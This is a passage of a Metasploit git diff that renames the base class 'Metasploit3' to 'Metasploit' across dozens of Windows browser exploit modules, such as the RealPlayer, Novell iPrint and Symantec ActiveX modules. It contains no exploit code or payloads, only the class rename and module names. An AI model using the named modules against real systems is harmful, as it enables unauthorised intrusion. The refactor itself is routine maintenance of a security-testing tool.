b/modules/exploits/windows/browser/msvidctl_mpeg2.rb index 70582071df..e323087a47 100644 --- a/modules/exploits/windows/browser/msvidctl_mpeg2.rb +++ b/modules/exploits/windows/browser/msvidctl_mpeg2.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/mswhale_checkforupdates.rb b/modules/exploits/windows/browser/mswhale_checkforupdates.rb index 6acfe799f4..622b98b22d 100644 --- a/modules/exploits/windows/browser/mswhale_checkforupdates.rb +++ b/modules/exploits/windows/browser/mswhale_checkforupdates.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb index 040ee2fa16..faae514207 100644 --- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb +++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb index 5202ae760e..41f2c31d9c 100644 --- a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb +++ b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/nis2004_antispam.rb b/modules/exploits/windows/browser/nis2004_antispam.rb index d137afaaea..5999148607 100644 --- a/modules/exploits/windows/browser/nis2004_antispam.rb +++ b/modules/exploits/windows/browser/nis2004_antispam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/nis2004_get.rb b/modules/exploits/windows/browser/nis2004_get.rb index 292b1c9539..b5d00aff61 100644 --- a/modules/exploits/windows/browser/nis2004_get.rb +++ b/modules/exploits/windows/browser/nis2004_get.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/notes_handler_cmdinject.rb b/modules/exploits/windows/browser/notes_handler_cmdinject.rb index d6e76ffe2d..03c8a82aab 100644 --- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb +++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb index 2c5c4424cf..d0a4704c72 100644 --- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb +++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_callbackurl.rb b/modules/exploits/windows/browser/novelliprint_callbackurl.rb index 28b4f9ef75..ea2379aedf 100644 --- a/modules/exploits/windows/browser/novelliprint_callbackurl.rb +++ b/modules/exploits/windows/browser/novelliprint_callbackurl.rb @@ -34,7 +34,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_datetime.rb b/modules/exploits/windows/browser/novelliprint_datetime.rb index d247e134c7..058dc22ee0 100644 --- a/modules/exploits/windows/browser/novelliprint_datetime.rb +++ b/modules/exploits/windows/browser/novelliprint_datetime.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_executerequest.rb b/modules/exploits/windows/browser/novelliprint_executerequest.rb index 6ec5f52b65..555aa0c197 100644 --- a/modules/exploits/windows/browser/novelliprint_executerequest.rb +++ b/modules/exploits/windows/browser/novelliprint_executerequest.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb index cc6954458c..8741654bd1 100644 --- a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb +++ b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb @@ -34,7 +34,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb index fd55d572ea..967bd84e24 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb index 70db241a7c..2cbb87b687 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/novelliprint_target_frame.rb b/modules/exploits/windows/browser/novelliprint_target_frame.rb index 4461b2a70e..ab4fb3f201 100644 --- a/modules/exploits/windows/browser/novelliprint_target_frame.rb +++ b/modules/exploits/windows/browser/novelliprint_target_frame.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ntr_activex_check_bof.rb b/modules/exploits/windows/browser/ntr_activex_check_bof.rb index 846f4befde..3404876347 100644 --- a/modules/exploits/windows/browser/ntr_activex_check_bof.rb +++ b/modules/exploits/windows/browser/ntr_activex_check_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb index 9c195aa332..186c7d667b 100644 --- a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb +++ b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb index 694e4d6431..40adfa52ce 100644 --- a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb +++ b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb index 51961e8099..6628894771 100644 --- a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb +++ b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb index f80e83d451..21eecba0d8 100644 --- a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb +++ b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/orbit_connecting.rb b/modules/exploits/windows/browser/orbit_connecting.rb index 5295485415..e5bb43c8b5 100644 --- a/modules/exploits/windows/browser/orbit_connecting.rb +++ b/modules/exploits/windows/browser/orbit_connecting.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ovftool_format_string.rb b/modules/exploits/windows/browser/ovftool_format_string.rb index 34d945a5d1..ee1d52e8c4 100644 --- a/modules/exploits/windows/browser/ovftool_format_string.rb +++ b/modules/exploits/windows/browser/ovftool_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/pcvue_func.rb b/modules/exploits/windows/browser/pcvue_func.rb index c5c57b34c1..156f23e32f 100644 --- a/modules/exploits/windows/browser/pcvue_func.rb +++ b/modules/exploits/windows/browser/pcvue_func.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/persits_xupload_traversal.rb b/modules/exploits/windows/browser/persits_xupload_traversal.rb index a74f4bcff9..8c08ac7c70 100644 --- a/modules/exploits/windows/browser/persits_xupload_traversal.rb +++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/quickr_qp2_bof.rb b/modules/exploits/windows/browser/quickr_qp2_bof.rb index d260b5ba37..c47259683d 100644 --- a/modules/exploits/windows/browser/quickr_qp2_bof.rb +++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/real_arcade_installerdlg.rb b/modules/exploits/windows/browser/real_arcade_installerdlg.rb index c2afc67f27..5ad241e379 100644 --- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb +++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_cdda_uri.rb b/modules/exploits/windows/browser/realplayer_cdda_uri.rb index 75f94ecd5b..2ad7b5a206 100644 --- a/modules/exploits/windows/browser/realplayer_cdda_uri.rb +++ b/modules/exploits/windows/browser/realplayer_cdda_uri.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_console.rb b/modules/exploits/windows/browser/realplayer_console.rb index 33fedfc9c6..7eee59b751 100644 --- a/modules/exploits/windows/browser/realplayer_console.rb +++ b/modules/exploits/windows/browser/realplayer_console.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_import.rb b/modules/exploits/windows/browser/realplayer_import.rb index 0aab25f860..78ba6303e3 100644 --- a/modules/exploits/windows/browser/realplayer_import.rb +++ b/modules/exploits/windows/browser/realplayer_import.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_qcp.rb b/modules/exploits/windows/browser/realplayer_qcp.rb index 9a14d5500a..df17c639ae 100644 --- a/modules/exploits/windows/browser/realplayer_qcp.rb +++ b/modules/exploits/windows/browser/realplayer_qcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/realplayer_smil.rb b/modules/exploits/windows/browser/realplayer_smil.rb index 7c0cc98bb6..11d1b1780f 100644 --- a/modules/exploits/windows/browser/realplayer_smil.rb +++ b/modules/exploits/windows/browser/realplayer_smil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/roxio_cineplayer.rb b/modules/exploits/windows/browser/roxio_cineplayer.rb index af12347a60..b07927b886 100644 --- a/modules/exploits/windows/browser/roxio_cineplayer.rb +++ b/modules/exploits/windows/browser/roxio_cineplayer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb index d6fe45cc71..2ab0e28757 100644 --- a/modules/exploits/windows/browser/safari_xslt_output.rb +++ b/modules/exploits/windows/browser/safari_xslt_output.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb index 74706eabcb..a94a53dff0 100644 --- a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb +++ b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb index 3fee969510..b7277f7ed2 100644 --- a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb +++ b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb index 33f43e125b..df772422a7 100644 --- a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb +++ b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/softartisans_getdrivename.rb b/modules/exploits/windows/browser/softartisans_getdrivename.rb index b234fe3cdb..799cd57762 100644 --- a/modules/exploits/windows/browser/softartisans_getdrivename.rb +++ b/modules/exploits/windows/browser/softartisans_getdrivename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb index 826b8ebc90..79a53c828b 100644 --- a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb +++ b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb index de69777a84..b7336f7765 100644 --- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb +++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb index bdad1cf0ff..cd40668d47 100644 --- a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb +++ b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking diff --git a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb index 034b2bb5a2..0b42ce3594 100644 --- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb +++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb index aa83462d25..afc6b3d02c 100644 --- a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb +++ b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb index 040559c4ba..7cad373737 100644 --- a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb +++ b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb b/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb index e3471a628f..854ae601b0 100644 --- a/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb +++ b/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb index 0d0a45ad76..0410a94e30 100644 --- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb +++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb index d699f52c02..3b7d5f41c2 100644 --- a/modules/exploits/windows/browser/teechart_pro.rb +++ b/modules/exploits/windows/browser/teechart_pro.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb index c784f2aace..f067044f3f 100644 --- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb +++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/trendmicro_extsetowner.rb b/modules/exploits/windows/browser/trendmicro_extsetowner.rb index 8d3c754bbf..8594cdd2c9 100644 --- a/modules/exploits/windows/browser/trendmicro_extsetowner.rb +++ b/modules/exploits/windows/browser/trendmicro_extsetowner.rb @@ -33,7 +33,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/trendmicro_officescan.rb b/modules/exploits/windows/browser/trendmicro_officescan.rb index 94fbfcded7..77b99ef886 100644 --- a/modules/exploits/windows/browser/trendmicro_officescan.rb +++ b/modules/exploits/windows/browser/trendmicro_officescan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb index f012e29f3c..b496c793f7 100644 --- a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb +++ b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb index 8bbdc303e6..13b93f35c7 100644 --- a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb +++ b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb index cdb9360048..a8cde33a1a 100644 --- a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb +++ b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ultraoffice_httpupload.rb b/modules/exploits/windows/browser/ultraoffice_httpupload.rb index 05b995f2ba..3c262460f8 100644 --- a/modules/exploits/windows/browser/ultraoffice_httpupload.rb +++ b/modules/exploits/windows/browser/ultraoffice_httpupload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/verypdf_pdfview.rb b/modules/exploits/windows/browser/verypdf_pdfview.rb index 9ad826a3e4..eac2e072f9 100644 --- a/modules/exploits/windows/browser/verypdf_pdfview.rb +++ b/modules/exploits/windows/browser/verypdf_pdfview.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb index 5aac5af13b..51946b5f40 100644 --- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb +++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/vlc_amv.rb b/modules/exploits/windows/browser/vlc_amv.rb index b6d98e0d67..9049069e6c 100644 --- a/modules/exploits/windows/browser/vlc_amv.rb +++ b/modules/exploits/windows/browser/vlc_amv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/vlc_mms_bof.rb b/modules/exploits/windows/browser/vlc_mms_bof.rb index 69886b5b78..1763f073d5 100644 --- a/modules/exploits/windows/browser/vlc_mms_bof.rb +++ b/modules/exploits/windows/browser/vlc_mms_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/webdav_dll_hijacker.rb b/modules/exploits/windows/browser/webdav_dll_hijacker.rb index 0751a93afc..7ea686f302 100644 --- a/modules/exploits/windows/browser/webdav_dll_hijacker.rb +++ b/modules/exploits/windows/browser/webdav_dll_hijacker.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb index a4aa0fee3e..bba93b9c68 100644 --- a/modules/exploits/windows/browser/webex_ucf_newobject.rb +++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb index 6efae24eeb..a9d5e1b38b 100644 --- a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb +++ b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb index eaba3e96eb..c444a5fc6d 100644 --- a/modules/exploits/windows/browser/winamp_playlist_unc.rb +++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/winamp_ultravox.rb 